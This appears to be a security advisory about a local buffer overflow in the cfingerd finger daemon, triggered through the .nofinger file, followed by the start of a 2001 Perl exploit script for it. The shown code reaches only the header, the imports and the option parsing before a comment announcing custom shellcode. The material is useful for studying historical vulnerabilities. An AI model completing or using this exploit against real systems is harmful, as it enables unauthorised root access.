cfingerd is a secure implementation of the finger daemon. cfingerd has been contributed to by many authors, and is maintained by the cfingerd development team.
A buffer overflow in cfingerd makes it possible for a local user to gain elevated privileges. Due to insufficient validation of input, a user can execute arbitrary code through the .nofinger file.
This makes it possible for a local user to gain elevated privileges, and potentially root access.
#!/usr/bin/perl
# | Local buffer overflow exploit for cfingerd
# | Copyright (c) 2001 by <teleh0r@digit-labs.org>
# | All rights reserved.
# |
# | Simple exploit for the vulnerability reported
# | to bugtraq by Steven Van Acker.
# | http://www.securityfocus.com/archive/1/192844
# |
# | If cfingerd does not run as root, the exploit
# | will of course fail!
# |
# | http://www.digit-labs.org/teleh0r/
use Socket; use File::Copy;
use Getopt::Std; getopts('s:p:o:', \%arg);
if (defined($arg{'s'})) { $sjell = $arg{'s'} }
if (defined($arg{'p'})) { $port = $arg{'p'} }
if (defined($arg{'o'})) { $offset = $arg{'o'} }
# shellcodes written by myself especially for
# this exploit.